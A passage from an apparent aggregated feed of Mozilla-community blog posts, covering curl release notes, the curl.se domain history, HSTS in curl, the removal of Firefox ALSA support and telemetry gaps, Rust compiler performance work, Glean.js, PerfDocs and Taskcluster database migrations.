When it looks okay, I run a cleanup round to sort it and remove unused references from the file…

$ ./scripts/release-notes.pl cleanup

Then I make sure to get a fresh list of contributors…

$ ./scripts/contributors.sh

… and paste that updated list into the RELEASE-NOTES. Finally, I get refreshed counters for the numbers at the top of the file by running

$ ./scripts/delta

Then I commit the update (which needs to have the commit message “RELEASE-NOTES: synced”) and push it to master. Done!

The most up-to-date version of RELEASE-NOTES is then always made available on https://curl.se/dev/release-notes.html

Credits

Picture by me, taken from the passenger seat on a helicopter tour in 2011.

Chris H-CData Science is Hard: ALSA in Firefox

(( We’re overdue for another episode in this series on how Data Science is Hard. Today is a story from 2016 which I think illustrates many important things to do with data. ))

It’s story time. Gather ’round.

In July of 2016, Anthony Jones made the case that the Mozilla-built Firefox for Linux should stop supporting the ALSA backend (and also the WinXP WinMM backend) so that we could innovate on features for more modern audio backends.

(( You don’t need to know what an audio backend is to understand this story. ))

The code supporting ALSA would remain in tree for any Linux distribution who wished to maintain the backend and build it for themselves, but Mozilla would stop shipping Firefox with that code in it.

But how could we ensure the number of Firefoxen relying on this backend was small enough that we wouldn’t be removing something our users desperately needed? Luckily :padenot had just added an audio backend measurement to Telemetry. “We’ll have data soon,” he wrote.

By the end of August we’d heard from Firefox Nightly and Firefox Developer Edition that only 3.5% and 2% (respectively) of Linux subsessions with audio used ALSA. This was small enough for the removal to move ahead.

Fast-forward to March of 2017. Seven months have passed. The removal has wound its way through Nightly, Developer Edition, Beta, and now into the stable Release channel. Linux users following this update channel update their Firefox and… suddenly the web grows silent for a large number of users.

Bugs are filed (thirteen of them). The mailing list thread with Anthony’s original proposal is revived with some very angry language. It seems as though far more than just a fraction of a fraction of users were using ALSA. There were entire Linux distributions that didn’t ship anything besides ALSA. How did Telemetry miss them?

It turns out that many of those same ALSA-only Linux distributions also turned off Telemetry when they repackaged Firefox for their users. And for any that shipped with Telemetry at all, many users disabled it themselves. Those users’ Firefoxen had no way to phone home to tell Mozilla how important ALSA was to them… and now it was too late.

Those Linux distributions started building ALSA support into their distributed Firefox builds… and hopefully began reporting Telemetry by default to prevent this from happening again. I don’t know if they did for sure (we don’t collect fine-grained information like that because we don’t need it).

But it serves as a cautionary tale: Mozilla can only support a finite number of things. Far fewer now than we did back in 2016. We prioritize what we support based on its simplicity and its reach. That first one we can see for ourselves, and for the second we rely on data collection like Telemetry to tell us.

Counting things is harder than it looks. Counting things that are invisible is damn near impossible. So if you want to be counted: turn Telemetry on (it’s in the Preferences) and leave it on.

:chutten

Cameron KaiserTenFourFox FPR29b1 available

TenFourFox Feature Parity Release 29 beta 1 is now available (downloads, hashes, release notes). Raphaël's JavaScript toggle is back in the Tools menu but actually OlgaTPark gets most of the credit this release for some important backports from mainline Firefox, including fixes to DOM fetch which should improve a number of sites and adding a key combination (Command-Option-R in the default en-US locale) to toggle Reader View. These features require new locale strings, so expect new language packs with this release (tip of the hat to Chris T who maintains them). The usual bug and security fixes apply as well. FPR29 will come out parallel with Firefox 78.5/83 on or about November 17.

The December release may be an SPR only due to the holidays and my work schedule. More about that a little later.

Daniel StenbergThe journey to a curl domain

Good things come to those who wait?

When I created and started hosting the first websites for curl I didn’t care about the URL or domain names used for them, but after a few years I started to think that maybe it would be cool to register a curl domain for its home. By then it was too late to find an available name under a “sensible” top-level domain and since then I’ve been on the lookout for one.

Yeah, I host it

So yes, I’ve administrated every machine that has ever hosted the curl web site going all the way back to the time before we called the tool curl. I’m also doing most of the edits and polish of the web content, even though I’m crap at web stuff like CSS and design. So yeah, I consider it my job to care for the site and make sure it runs smooth and that it has a proper (domain) name.

www.fts.frontec.se

The first ever curl web page was hosted on “www.fts.frontec.se/~dast/curl” in the late 1990s (snapshot). I worked for the company with that domain name at the time and ~dast was the location for my own personal web content.

curl.haxx.nu

The curl website moved to its first “own home”, with curl.haxx.nu in August 1999 (snapshot) when we registered our first domain and the .nu top-level domain was available to us when .se wasn’t.

curl.haxx.se

We switched from curl.haxx.nu to curl.haxx.se in the summer of 2000 (when we finally were allowed to register our name in the .se TLD) (snapshot).

The name “haxx” in the domain has been the reason for many discussions and occasional concerns from users and overzealous blocking-scripts over the years. I’ve kept the curl site on that domain since it is the name of one of the primary curl sponsors and partly because I want to teach the world that a particular word in a domain is not a marker for badness or something like that. And of course because we have not bought or been provided a better alternative.

Haxx is still the name of the company I co-founded back in 1997 so I’m also the admin of the domain.

curl.se

I’ve looked for and contacted owners of curl under many different TLDs over the years but most have never responded and none has been open for giving up their domains. I’ve always had an extra attention put on curl.se because it is in the Swedish TLD, the same one we have for Haxx and where I live.

The curling background

The first record on archive.org of anyone using the domain curl.se for web content is dated August 2003 when the Swedish curling team “Härnösands CK” used it. They used the domain and website for a few years under this name. It can be noted that it was team Anette Norberg, which subsequently won two Olympic gold medals in the sport.

In September 2007 the site was renamed, still being about the sport curling but with the name “the curling girls” in Swedish (curlingtjejerna) which remained there for just 1.5 years until it changed again. “curling team Folksam” then populated the site with contents about the sport and that team until they let the domain expire in 2012. (Out of these three different curling oriented sites, the first one is the only one that still seems to be around but now of course on another domain.)

Ads

In early August 2012 the domain was registered to a new owner. I can’t remember why, but I missed the chance to get the domain then.

August 28 2012 marks the first date when curl.se is recorded to suddenly host a bunch of links to casino, bingo and gambling sites. It seems that whoever bought the domain wanted to surf on the good name and possible incoming links built up from the previous owners. For several years this crap was what the website showed. I doubt very many users ever were charmed by the content nor clicked on many links. It was ugly and over-packed with no real content but links and ads.

The last archive.org capture of the ad-filled site was done on October 2nd 2016. Since then, there’s been no web content on the domain that I’ve found. But the domain registration kept getting renewed.

Failed to purchase

In August 2019, I noticed that the domain was about to expire, and I figured it could be a sign that the owner was not too interested in keeping it anymore. I contacted the owner via a registrar and offered to buy it. The single only response I ever got was that my monetary offer was “too low”. I tried to up my bid, but I never got any further responses from the owner and then after a while I noticed that the domain registration was again renewed for another year. I went back to waiting.

Expired again

In September 2020 the domain was again up for expiration and I contacted the owner again, this time asking for a price for which they would be willing to sell the domain. Again no response, but this time the domain actually went all the way to expiry and deletion, which eventually made it available “on the market” for everyone interested to compete for the purchase.

I entered the race with the help of a registrar that would attempt to buy the name when it got released. When this happens, when a domain name is “released”, it becomes a race between all the potential buyers who want the domain. It is a 4-letter domain that is an English word and easily pronounceable. I knew there was a big risk others would also be trying to get it.

In the early morning of October 19th 2020, the curl.se domain was released and in the race of getting the purchase… I lost. Someone else got the domain before me. I was sad. For a while, until I got the good news…

Donated!

It turned out my friend Bartek Tatkowski had snatched the domain! After getting all the administrative things in order, Bartek graciously donated the domain to me and 15:00 on October 30 2020 I could enter my own name servers into the dedicated inputs fields for the domain, and configure it properly in our master and secondary DNS servers.

curl.se is the new home

Starting on November 4, 2020 curl.se is the new official home site for the curl project. The curl.haxx.se name will of course remain working for a long time more and I figure we can basically never shut it down as there are so many references to it spread out over the world. I intend to eventually provide redirects for most things from the old name to the new.

What about a www prefix? The jury is still out how or if we should use that or not. The initial update of the site (November 4) uses a www.curl.se host name in links but I’ve not done any automatic redirects to or from that. As the site is CDNed, and we can’t use CNAMEs on the apex domain (curl.se), we instead use anycast IPs for it – the net difference to users should be zero. (Fastly is a generous sponsor of the curl project.)

I also happen to own libcurl.se since a few years back and I’ll make sure using this name also takes you to the right place.

Why not curl.dev?

People repeatedly ask me. Names in the .dev domains are expensive. Registering curl.dev goes for 400 USD right now. curl.se costs 10 USD/year. I see little to no reason to participate in that business and I don’t think spending donated money on such a venture is a responsible use of our funds.

Credits

Image by truthseeker08 from Pixabay. Domain by Bartek Tatkowski.

This Week In RustThis Week in Rust 363

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

No Rust Blog posts this week.

Newsletters
Tooling
Observations/Thoughts
Rust Walkthroughs
Project Updates
Miscellaneous

Crate of the Week

This week's crate is tract from Sonos, a neural network inference library, written purely in Rust for models in ONNX, NNEF and TF formats.

Thanks to Benjamin Minixhofer for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

374 pull requests were merged in the last week

Rust Compiler Performance Triage

  • 2020-11-03: 0 Regressions, 5 Improvements, 0 mixed

A number of improvements on various benchmarks. The most notable news this week in compiler performance is the progress on instruction metric collection on a per-query level; see measureme#143 for the latest.

Otherwise, this week was an excellent one for performance (though mostly on stress tests and auto-generated test cases rather than commonly seen code).

See the full report for more.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs

New RFCs

Upcoming Events

Online

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Like other languages Rust does have footguns. The difference is that we keep ours locked up in the unsafe.

Ted Mielczarek on twitter

Thanks to Nikolai Vazquez for the suggestion.

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Mozilla Performance BlogDynamic Test Documentation with PerfDocs

After over twenty years, Mozilla is still going strong. But over that amount of time, there are bound to be changes in responsibilities. This brings unique challenges to test maintenance: when original creators leave, knowledge of a test’s purpose and inner workings can disappear with them. This is especially true when it comes to performance testing.

Our first performance testing framework is Talos, which was built in 2007. It’s a fantastic tool that is still used today for performance testing very specific aspects of Firefox. We currently have 45 different performance tests in Talos, and all of those together produce as many as 462 metrics. Having said that, maintaining the tests themselves is a challenge because some of the people who originally built them are no longer around. The last person who touched the code, and who is still around, usually becomes the maintainer of these tests. But with a lack of documentation on the tests themselves, this becomes a difficult task when you consider that a modification could change what is being measured and move the test away from its original purpose.

Over time, we’ve built another performance testing framework called Raptor which is primarily used for page load testing (e.g. measuring first paint, and first contentful paint). This framework is much simpler to maintain and keep up with its purpose but the settings used for the tests change often enough that it becomes easy to forget how we set up the test, or what pages are being tested exactly. We have a couple other frameworks too, with the newest one (which is still in development) being MozPerftest – there might be a blog post on this in the future. With this many frameworks and tests, it’s easy to see how test maintenance over the long term can turn into a bit of a mess when it’s left unchecked.

To overcome this issue, we decided to implement a tool to dynamically document all of our existing performance tests in a single interface while also being able to prevent new tests from being added without proper documentation or, at the least, an acknowledgement of the existence of the test. We called this tool PerfDocs.

Currently, we use PerfDocs to document tests in Raptor and MozPerftest (with Talos in the plans for the future). At the moment in Raptor, we only document the tests that we have, along with the pages that are being tested. Given that Raptor is a simple framework with the main purpose being to measure page loads, this documentation gives us enough without getting overly complex. However, we do plan to add much more information to it in the future (e.g. what branches the tests run on, what are the test settings).

The PerfDocs integration with MozPerftest is far more interesting though, and you can find it here. In MozPerftest, all tests have a mandatory requirement of having metadata in the test itself. For example, here’s a test we have for measuring the start-up time on our mobile browsers which describes things such as the browsers that it runs on, and even the owner of the test. This lets us force the test writer to think about maintainability as we move into the future rather than simply writing it and forgetting it. For that Android VIEW test, you can find the generated documentation here. If you look through the documented tests that we have, you’ll notice that we also don’t have a single person listed as a maintainer. Instead, we refer to the team that built it as the maintainer. Furthermore, the tests actually live in the folders (or code) that those teams are responsible for, so they don’t need to exist in the framework’s folder, which gives us more accountability for their maintenance. By building tests this way, with documentation in mind, we can ensure that as time goes on, we won’t lose information about what is being tested, its purpose, or who should be responsible for maintaining it.

Lastly, as I alluded to above, outside of generating documentation dynamically we also ensure that any new tests are properly documented before they are added into mozilla-central. This is done for both Raptor and MozPerftest through a tool called review-bot, which runs tests on submitted patches in Phabricator (the code review tool that we use). When a patch is submitted, PerfDocs will run to make sure that (1) all the tests that are documented actually exist, and (2) all the tests that exist are actually documented. This way, we can prevent our documentation from becoming outdated with tests that don’t exist anymore, and ensure that all tests are always documented in some way.

PerfDocs Review Bot Comment

The review-bot left a complaint on this patch, which was adding new suites – in this case because it could not find the actual tests.

In the future, we hope to be able to expand this tool and its features from our performance tests to the massive box of functional tests that we have. If you think having 462 metrics to track is a lot, consider the thousands of tests we have for ensuring that Firefox functionality is properly tested.

This project started in Q4 of 2019, with myself [:sparky], and Alexandru Ionescu [:alexandrui] building up the base of this tool. Then, in early H1-2020, Myeongjun Go [:myeongjun], a fantastic volunteer contributor, began hacking on this project and brought us from lightly documenting Raptor tests to having links to the tested pages in it, and even integrating PerfDocs into MozPerftest.

If you have any questions, feel free to reach out to us on Riot in #perftest.

Daniel StenbergHSTS your curl

HTTP Strict Transport Security (HSTS) is a standard HTTP response header for sites to tell the client that for a specified period of time into the future, that host is not to be accessed with plain HTTP but only using HTTPS. Documented in RFC 6797 from 2012.

The idea is of course to reduce the risk for man-in-the-middle attacks when the server resources might be accessible via both HTTP and HTTPS, perhaps due to legacy or just as an upgrade path. Every access to the HTTP version is then a risk that you get back tampered content.
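
For illustration, an HSTS response header from a site that opts in for a year, subdomains included, looks like this:

Strict-Transport-Security: max-age=31536000; includeSubDomains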

Browsers preload

These headers have been supported by the popular browsers for years already, and they also have a system setup for preloading a set of sites. Sites that exist in their preload list then never get accessed over HTTP since they know of their HSTS state already when the browser is fired up for the first time.

The entire .dev top-level domain is even in that preload list so you can in fact never access a web site on that top-level domain over HTTP with the major browsers.

With the curl tool

Starting in curl 7.74.0, curl has experimental support for HSTS. Experimental means it isn’t enabled by default and we discourage use of it in production. (Scheduled to be released in December 2020.)

You instruct curl to understand HSTS and to load/save a cache with HSTS information using --hsts <filename>. The HSTS cache saved into that file is then updated on exit and if you do repeated invokes with the same cache file, it will effectively avoid clear text HTTP accesses for as long as the HSTS headers tell it.
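
A session with the tool could then look something like this (the file name is arbitrary, and example.org stands in for a site that actually sends the header):

$ curl --hsts hsts.txt https://example.org/
$ curl --hsts hsts.txt http://example.org/

Assuming the first response carried an HSTS header, the second request is switched to HTTPS internally even though a plain HTTP URL was given, for as long as the cached entry is valid.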

I envision that users will simply use a small HSTS cache file for specific use cases, rather than ever really wanting to have or use a “complete” preload list of domains such as the one the browsers use, as that’s a huge list of sites and for most use cases completely unnecessary to load and handle.

With libcurl

Possibly, this feature is more useful and appreciated by applications that use libcurl for HTTP(S) transfers. With libcurl the application can set a file name to use for loading and saving the cache but it also gets some added options for more flexibility and powers. Here’s a quick overview:

CURLOPT_HSTS – lets you set a file name to read/write the HSTS cache from/to.

CURLOPT_HSTS_CTRL – enable HSTS functionality for this transfer

CURLOPT_HSTSREADFUNCTION – this callback gets called by libcurl when it is about to start a transfer and lets the application preload HSTS entries – as if they had been read over the wire and been added to the cache.

CURLOPT_HSTSWRITEFUNCTION – this callback gets called repeatedly when libcurl flushes its in-memory cache and allows the application to save the cache somewhere and similar things.

Feedback?

I trust you understand that I’m very very keen on getting feedback on how this works, on the API and your use cases. Both negative and positive. Whatever your thoughts are really!

Data@MozillaThis week in Glean: Glean.js

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.)

In a previous TWiG blog post, I talked about my experiment on trying to compile glean-core to Wasm. The motivation for that experiment was the then upcoming Glean.js workweek, where some of us were going to take a pass at building a proof-of-concept implementation of Glean in Javascript. That blog post ends on the following note:

My conclusion is that although we can compile glean-core to Wasm, it doesn’t mean that we should do that. The advantages of having a single source of truth for the Glean SDK are very enticing, but at the moment it would be more practical to rewrite something specific for the web.

When I wrote that post, we hadn’t gone through the Glean.js workweek and were not sure yet if it would be viable to pursue a new implementation of Glean in Javascript.

I am not going to keep up the suspense though. We were able to implement a proof-of-concept version of Glean that works in Javascript environments during that workweek. It:

  • Persisted data throughout application runs (e.g. client_id);
  • Allowed for recording event metrics;
  • Sent Glean schema compliant pings to the pipeline.

And all of this, we were able to make work on:

  • Static websites;
  • Svelte apps;
  • Node.js servers;
  • Electron apps;
  • Node.js command line applications;
  • Qt/QML apps.

Check out the code for this project on: https://github.com/brizental/gleanjs

The outcome of the workweek confirmed it was possible and worth it to go ahead with Glean.js. For the past few weeks the Glean SDK team has officially been working on the roadmap for this project’s MVP.

Our plan is to have an MVP of Glean.js that can be used on webextensions by February/2021.

The reason for our initial focus on webextensions is that the Ion project has volunteered to be Glean.js’ first consumer. Support for static websites and Qt/QML apps will follow. Other consumers such as Node.js servers and CLIs are not part of the initial roadmap.

Although we learned a lot by building the POC, we were probably left with more open questions than answered ones. The Javascript environment is a very special one and when we set out to build something that can work virtually anywhere that runs Javascript, we were embarking on an adventure.

Each Javascript environment has different resources the developer can interact with. Let’s think, for example, about persistence solutions: on web browsers we can use localStorage or IndexedDB, but on Node.js servers / CLIs we would need to go another way completely and use Level DB or some other external library. What is the best way to deal with this and what exactly are the differences between environments?

The issue of having different resources is not even the most challenging one. Glean defines internal metrics and their lifetimes, and internal pings and their schedules. This is important so that our users can do base analysis without having any custom metrics or pings. The hardest open question we were left with was: what pings should Glean.js send out of the box and what should their scheduling look like?

Because Glean.js opens up possibilities for such varied consumers: from websites to CLIs, defining scheduling that will be universal for all of its consumers is probably not even possible. If we decide to tackle these questions for each environment separately, we are still facing tricky consumers and consumers that we are not used to, such as websites and web extensions.

Websites specifically come with many questions: how can we guarantee client-side data persistence, if a user can easily delete all of it by running some code in the console or tweaking browser settings? What is the best scheduling for pings, if each website can have so many different usage lifecycles?

We are excited to tackle these and many other challenges in the coming months. Development of the roadmap can be followed on Bug 1670910.

Nicholas NethercoteHow to speed up the Rust compiler in 2020

I last wrote in December 2019 about my work on speeding up the Rust compiler. Time for another update.

Incremental compilation

I started the year by profiling incremental compilation and making several improvements there.

#68914: Incremental compilation pushes a great deal of data through a hash function, called SipHasher128, to determine what code has changed since the last compiler invocation. This PR greatly improved the extraction of bytes from the input byte stream (with a lot of back and forth to ensure it worked on both big-endian and little-endian platforms), giving incremental compilation speed-ups of up to 13% across many benchmarks. It also added a lot more comments to explain what is going on in that code, and removed multiple uses of unsafe.

#69332: This PR reverted the part of #68914 that changed the u8to64_le function in a way that made it simpler but slower. This didn’t have much impact on performance because it’s not a hot function, but I’m glad I caught it in case it gets used more in the future. I also added some explanatory comments so nobody else will make the same mistake I did!

#69050: LEB128 encoding is used extensively within Rust crate metadata. Michael Woerister had previously sped up encoding and decoding in #46919, but there was some fat left. This PR carefully minimized the number of operations in the encoding and decoding loops, almost doubling their speed, and giving wins on many benchmarks of up to 5%. It also removed one use of unsafe. In the PR I wrote a detailed description of the approach I took, covering how I found the potential improvement via profiling, the 18 different things I tried (10 of which improved speed), and the final performance results.

LLVM bitcode

Last year I noticed from profiles that rustc spends some time compressing the LLVM bitcode it produces, especially for debug builds. I tried changing it to not compress the bitcode, and that gave some small speed-ups, but also increased the size of compiled artifacts on disk significantly.

Then Alex Crichton told me something important: the compiler always produces both object code and bitcode for crates. The object code is used when compiling normally, and the bitcode is used when compiling with link-time optimization (LTO), which is rare. A user is only ever doing one or the other, so producing both kinds of code is typically a waste of time and disk space.

In #66598 I tried a simple fix for this: add a new flag to rustc that tells it to omit the LLVM bitcode. Cargo could then use this flag whenever LTO wasn’t being used. After some discussion we decided it was too simplistic, and filed issue #66961 for a more extensive change. That involved getting rid of the use of compressed bitcode by instead storing uncompressed bitcode in a section in the object code (a standard format used by clang), and introducing the flag for Cargo to use to disable the production of bitcode.

The part of rustc that deals with all this was messy. The compiler can produce many different kinds of output: assembly code, object code, LLVM IR, and LLVM bitcode in a couple of possible formats. Some of these outputs are dependent on other outputs, and the choices on what to produce depend on various command line options, as well as details of the particular target platform. The internal state used to track output production relied on many boolean values, and various nonsensical combinations of these boolean values were possible.

When faced with messy code that I need to understand, my standard approach is to start refactoring. I wrote #70289, #70345, and #70384 to clean up code generation, #70297, #70729, and #71374 to clean up command-line option handling, and #70644 to clean up module configuration. Those changes gave me some familiarity with the code, simplified it, and I was then able to write #70458 which did the main change.

Meanwhile, Alex Crichton wrote the Cargo support for the new -Cembed-bitcode=no option (and also answered a lot of my questions). Then I fixed rustc-perf so it would use the correct revisions of rustc and Cargo together, without which the change would erroneously look like a performance regression on CI. Then we went through a full compiler-team approval and final comment period for the new command-line option, and it was ready to land.

Unfortunately, while running the pre-landing tests we discovered that some linkers can’t handle having bitcode in the special section. This problem was only discovered at the last minute because only then are all tests run on all platforms. Oh dear, time for plan B. I ended up writing #71323 which went back to the original, simple approach, with a flag called -Cbitcode-in-rlib=no. [EDIT: note that libstd is still compiled with -Cbitcode-in-rlib=yes, which means that libstd rlibs will still work with both LTO and non-LTO builds.]

The end result was one of the bigger performance improvements I have worked on. For debug builds we saw wins on a wide range of benchmarks of up to 18%, and for opt builds we saw wins of up to 4%. The size of rlibs on disk has also shrunk by roughly 15-20%. Thanks to Alex for all the help he gave me on this!

Anybody who invokes rustc directly instead of using Cargo might want to use -Cbitcode-in-rlib=no to get the improvements.

[EDIT (May 7, 2020): Alex subsequently got the bitcode-in-object-code-section approach working in #71528 by adding the appropriate “ignore this section, linker” incantations to the generated code. He then changed the option name back to the original -Cembed-bitcode=no in #71716. Thanks again, Alex!]

Miscellaneous improvements

#67079: Last year in #64545 I introduced a variant of the shallow_resolved function that was specialized for a hot calling pattern. This PR specialized that function some more, winning up to 2% on a couple of benchmarks.

#67340: This PR shrunk the size of the Nonterminal type from 240 bytes to 40 bytes, reducing the number of memcpy calls (because memcpy is used to copy values larger than 128 bytes), giving wins on a few benchmarks of up to 2%.

#68694: InferCtxt is a type that contained seven different data structures within RefCells. Several hot operations would borrow most or all of the RefCells, one after the other. This PR grouped the seven data structures together under a single RefCell in order to reduce the number of borrows performed, for wins of up to 5%.

#68790: This PR made a couple of small improvements to the merge_from_succ function, giving 1% wins on a couple of benchmarks.

#68848: The compiler’s macro parsing code had a loop that instantiated a large, complex value (of type Parser) on each iteration, but most of those iterations did not modify the value. This PR changed the code so it initializes a single Parser value outside the loop and then uses Cow to avoid cloning it except for the modifying iterations, speeding up the html5ever benchmark by up to 15%. (An aside: I have used Cow several times, and while the concept is straightforward I find the details hard to remember. I have to re-read the documentation each time. Getting the code to work is always fiddly, and I’m never confident I will get it to compile successfully… but once I do it works flawlessly.)

#69256: This PR marked with #[inline] some small hot functions relating to metadata reading and writing, for 1-5% improvements across a number of benchmarks.

#70837: There is a function called find_library_crate that does exactly what its name suggests. It did a lot of repetitive prefix and suffix matching on file names stored as PathBufs. The matching was slow, involving lots of re-parsing of paths within PathBuf methods, because PathBuf isn’t really designed for this kind of thing. This PR pre-emptively extracted the names of the relevant files as strings and stored them alongside the PathBufs, and changed the matching to use those strings instead, giving wins on various benchmarks of up to 3%.

#70876: Cache::predecessors is an oft-called function that produces a vector of vectors, and the inner vectors are usually small. This PR changed the inner vector to a SmallVec for some very small wins of up to 0.5% on various benchmarks.

Other stuff

I added support to rustc-perf for the compiler’s self-profiler. This gives us one more profiling tool to use on the benchmark suite on local machines.

I found that using LLD as the linker when building rustc itself reduced the time taken for linking from about 93 seconds to about 41 seconds. (On my Linux machine I do this by preceding the build command with RUSTFLAGS="-C link-arg=-fuse-ld=lld".) LLD is a really fast linker! #39915 is the three-year-old issue open for making LLD the default linker for rustc, but unfortunately it has stalled. Alexis Beingessner wrote a nice summary of the current situation. If anyone with knowledge of linkers wants to work on that issue, it could be a huge win for many Rust users.

Failures

Not everything I tried worked. Here are some notable failures.

#69152: As mentioned above, #68914 greatly improved SipHasher128, the hash function used by incremental compilation. That hash function is a 128-bit version of the default 64-bit hash function used by Rust hash tables. I tried porting those same improvements to the default hasher. The goal was not to improve rustc’s speed, because it uses FxHasher instead of default hashing, but to improve the speed of all Rust programs that do use default hashing. Unfortunately, this caused some compile-time regressions for complex reasons discussed in detail in the PR, and so I abandoned it. I did manage to remove some dead code in the default hasher in #69471, though.

#69153: While working on #69152, I tried switching from FxHasher back to the improved default hasher (i.e. the one that ended up not landing) for all hash tables within rustc. The results were terrible; every single benchmark regressed! The smallest regression was 4%, the largest was 85%. This demonstrates (a) how heavily rustc uses hash tables, and (b) how much faster FxHasher is than the default hasher when working with small keys.

I tried using ahash for all hash tables within rustc. It is advertised as being as fast as FxHasher but higher quality. I found it made rustc a tiny bit slower. Also, ahash is not deterministic across different builds, because it uses const_random! when initializing hasher state. This could cause extra noise in perf runs, which would be bad. (Edit: It would also prevent reproducible builds, which would also be bad.)

I tried changing the SipHasher128 function used for incremental compilation from the Sip24 algorithm to the faster but lower-quality Sip13 algorithm. I got wins of up to 3%, but wasn’t confident about the safety of the change and so didn’t pursue it further.

#69157: Some follow-up measurements after #69050 suggested that its changes to LEB128 decoding were not as clear a win as they first appeared. (The improvements to encoding were still definitive.) The performance of decoding appears to be sensitive to non-local changes, perhaps due to differences in how the decoding functions are inlined throughout the compiler. This PR reverted some of the changes from #69050 because my initial follow-up measurements suggested they might have been pessimizations. But then several sets of additional follow-up measurements taken after rebasing multiple times suggested that the reversions sometimes regressed performance. The reversions also made the code uglier, so I abandoned this PR.

#66405: Each obligation held by ObligationForest can be in one of several states, and transitions between those states occur at various points. This PR reduced the number of states from five to three, and greatly reduced the number of state transitions, which won up to 4% on a few benchmarks. However, it ended up causing some drastic regressions for some users, so in #67471 I reverted those changes.

#60608: This issue suggests using FxIndexSet in some places where currently an FxHashMap plus a Vec are used. I tried it for the symbol table and it was a significant regression for a few benchmarks.

Progress

Since my last blog post, compile times have seen some more good improvements. The following screenshot shows wall-time changes on the benchmark suite since then (2019-12-08 to 2020-04-22).

Table of compiler performance results.

The biggest changes are in the synthetic stress tests await-call-tree-debug, wf-projection-stress-65510, and ctfe-stress-4, which aren’t representative of typical code and aren’t that important.

Overall it’s good news, with many improvements (green), some in the double digits, and relatively few regressions (red). Many thanks to everybody who helped with all the performance improvements that landed during this period.

Dustin J. MitchellTaskcluster's DB (Part 2) - DB Migrations

This is part 2 of a deep-dive into the implementation details of Taskcluster’s backend data stores. Check out part 1 for the background, as we’ll jump right in here!

Azure in Postgres

As of the end of April, we had all of our data in a Postgres database, but the data was pretty ugly. For example, here’s a record of a worker as recorded by worker-manager:

partition_key | testing!2Fstatic-workers
row_key       | cc!2Fdd~ee!2Fff
value         | {
    "state": "requested",
    "RowKey": "cc!2Fdd~ee!2Fff",
    "created": "2015-12-17T03:24:00.000Z",
    "expires": "3020-12-17T03:24:00.000Z",
    "capacity": 2,
    "workerId": "ee/ff",
    "providerId": "updated",
    "lastChecked": "2017-12-17T03:24:00.000Z",
    "workerGroup": "cc/dd",
    "PartitionKey": "testing!2Fstatic-workers",
    "lastModified": "2016-12-17T03:24:00.000Z",
    "workerPoolId": "testing/static-workers",
    "__buf0_providerData": "eyJzdGF0aWMiOiJ0ZXN0ZGF0YSJ9Cg==",
    "__bufchunks_providerData": 1
  }
version       | 1
etag          | 0f6e355c-0e7c-4fe5-85e3-e145ac4a4c6c

To reap the benefits of a relational database, this should be a “normal”[*] table: distinct columns, sensible data types, and a lot less redundancy.

All access to this data is via some Azure-shaped stored functions, which are also not amenable to the kinds of flexible data access we need:

  • <tableName>_load - load a single row
  • <tableName>_create - create a new row
  • <tableName>_remove - remove a row
  • <tableName>_modify - modify a row
  • <tableName>_scan - return some or all rows in the table

[*] In the normal sense of the word – we did not attempt to apply database normalization.

Database Migrations

So the next step, which we dubbed “phase 2”, was to migrate this schema to one more appropriate to the structure of the data.

The typical approach is to use database migrations for this kind of work, and there are lots of tools for the purpose. For example, Alembic and Django both provide robust support for database migrations – but they are both in Python.

The only mature JS tool is knex, and after some analysis we determined that it both lacked features we needed and brought a lot of additional features that would complicate our usage. It is primarily a “query builder”, with basic support for migrations. Because we target Postgres directly, and because of how we use stored functions, a query builder is not useful. And the migration support in knex, while effective, does not support the more sophisticated approaches to avoiding downtime outlined below.

We elected to roll our own tool, allowing us to get exactly the behavior we wanted.

Migration Scripts

Taskcluster defines a sequence of numbered database versions. Each version corresponds to a specific database schema, which includes the structure of the database tables as well as stored functions. The YAML file for each version specifies a script to upgrade from the previous version, and a script to downgrade back to that version. For example, an upgrade script might add a new column to a table, with the corresponding downgrade dropping that column.

version: 29
migrationScript: |-
  begin
    alter table secrets add column last_used timestamptz;
  end
downgradeScript: |-
  begin
    alter table secrets drop column last_used;
  end

So far, this is a pretty normal approach to migrations. However, a major drawback is that it requires careful coordination around the timing of the migration and deployment of the corresponding code. Continuing the example of adding a new column, if the migration is deployed first, then the existing code may execute INSERT queries that omit the new column. If the new code is deployed first, then it will attempt to read a column that does not yet exist.

There are workarounds for these issues. In this example, we could add a default value for the new column in the migration, or write the queries so that they are robust to a missing column. Such queries are typically spread around the codebase, though, and it can be difficult to ensure (by testing, of course) that they all operate correctly.

In practice, most uses of database migrations are continuously-deployed applications – a single website or application server, where the developers of the application control the timing of deployments. That allows a great deal of control, and changes can be spread out over several migrations that occur in rapid succession.

Taskcluster is not continuously deployed – it is released in distinct versions which users can deploy on their own cadence. So we need a way to run migrations when upgrading to a new Taskcluster release, without breaking running services.

Stored Functions

Part 1 mentioned that all access to data is via stored functions. This is the critical point of abstraction that allows smooth migrations, because stored functions can be changed at runtime.

Each database version specifies definitions for stored functions, either introducing new functions or replacing the implementation of existing functions. So the version: 29 YAML above might continue with

methods:
  create_secret:
    args: name text, value jsonb
    returns: ''
    body: |-
      begin
        insert
        into secrets (name, value, last_used)
        values (name, value, now());
      end
  get_secret:
    args: name text
    returns: record
    body: |-
      begin
        update secrets
        set last_used = now()
        where secrets.name = get_secret.name;

        return query
        select name, value from secrets
        where secrets.name = get_secret.name;
      end
